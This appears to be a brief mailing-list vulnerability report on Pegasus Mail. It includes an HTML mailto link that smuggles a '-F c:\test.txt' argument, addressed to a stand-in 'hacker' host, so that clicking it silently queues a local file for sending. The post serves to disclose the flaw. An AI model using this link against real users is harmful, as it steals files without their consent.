Pegasus Mail

[Imran Ghory <ImranG () BTINTERNET COM>]

When using the following html,

<a href="mailto:hacker () hakersite com -F c:\test.txt"> Click
here</a>

When the user clicks on "Click here" Pegasus mail will
automatically creates a message which has a copy of the file
"c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

As inorder to have files stolen the user would have to click on the
dubious looking link, is this security risk serious ?

Imran Ghory